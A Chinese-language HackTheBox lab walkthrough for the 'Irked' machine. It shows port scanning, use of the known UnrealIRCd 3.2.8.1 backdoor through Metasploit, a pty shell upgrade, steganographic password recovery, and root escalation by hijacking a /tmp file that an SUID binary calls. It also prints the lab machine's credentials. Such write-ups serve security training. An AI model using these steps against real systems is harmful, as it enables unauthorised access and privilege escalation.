Irked - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/163

• 10.10.10.117

端口扫描

需要全端口,rpc和irc端口默认扫不到：

$ nmap -sC -sV -p- 10.10.10.117
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 13:50 CST
Nmap scan report for 10.10.10.117
Host is up (0.070s latency).
Not shown: 65527 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open     http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open     rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37278/tcp   status
|   100024  1          44225/tcp6  status
|   100024  1          53183/udp   status
|_  100024  1          55149/udp6  status
6697/tcp  open     irc     UnrealIRCd
8067/tcp  open     irc     UnrealIRCd
10134/tcp filtered unknown
37278/tcp open     status  1 (RPC #100024)
65534/tcp open     irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1384.51 seconds

80

一张图，页面信息也说明了IRC服务：

8067

irc服务端口，用客户端连接可以知道是Unreal 3.2.8.1：

irssi -c 10.10.10.117 --port 8067

UnrealIRCd

搜索发现相关漏洞：

• UnrealIRCd 3.2.8.1 - Remote Downloader/Execute - Linux remote Exploit
  https://www.exploit-db.com/exploits/13853
• UnrealIRCD 3.2.8.1 Backdoor Command Execution
  https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/

exploit

msf一键打：

python -c "import pty;pty.spawn('/bin/bash')"

信息搜集

在/home/djmardov/Documents目录里有个.backup文件，给出了steg backup密码：

UPupDOWNdownLRlrBAbaSSss

steghide

现在已有信息，可能有隐写的就80那张图,提取得到一个pass.txt：

wget http://10.10.10.117/irked.jpg
steghide extract -p UPupDOWNdownLRlrBAbaSSss -sf irked.jpg

➜  Irked cat pass.txt
Kab6h+m+bbp2J:HG

user flag

得到的密码就是djmardov用户的密码，ssh登录，Documents目录里得到user.txt:

提权信息

基础的suid，发现/usr/bin/viewuser：

find / -type f -perm -4000 2>/dev/null

尝试运行，发现它内部调用/tmp/listusers：

那就很简单了，/tmp/listusers可控，可以执行任意命令

提权 && root flag

直接调用/bin/bash即可：

/tmp/listusers

/bin/bash

参考资料

• UnrealIRCd 3.2.8.1 - Remote Downloader/Execute - Linux remote Exploit
  https://www.exploit-db.com/exploits/13853
• UnrealIRCD 3.2.8.1 Backdoor Command Execution
  https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/
• https://www.hackthebox.eu/home/machines/writeup/163
• HackTheBox - Irked - YouTube
  https://www.youtube.com/watch?v=OGFTM_qvtVI&feature=youtu.be&ab_channel=IppSec